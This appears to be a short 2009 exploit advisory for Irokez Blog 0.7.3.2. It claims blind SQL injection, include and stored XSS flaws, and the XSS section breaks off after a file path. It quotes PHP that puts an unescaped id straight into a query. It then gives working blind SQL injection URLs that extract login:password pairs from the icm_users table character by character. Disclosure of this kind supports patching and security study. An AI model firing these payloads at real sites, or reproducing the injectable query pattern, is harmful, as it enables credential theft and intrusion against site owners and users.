`================================================================================ || Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS ================================================================================ Application: Irokez Blog ------------ Website: http://irokez.org -------- Version: All (0.7.3.2) -------- Date: 11-02-2009 ----- [ BLIND SQL-INJECTION ] [ SOME VULNERABLE CODE ] /classes/table.class.php ... if ($is_trans) { $query = "select t.*, m.* from {$this->_name} m" . " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)" . " where m.id = '$id' group by {$this->_lang}"; } else { $query = "select * from {$this->_name} where id = '$id'"; } $result = $this->db->exeQuery($query); ===>>> Exploit: http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115 http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114 etc [ ACTIVE XSS ] in comments. [ SOME VULNERABLE CODE ] /scripts/blog/output-post.inc.php

...

Query Builder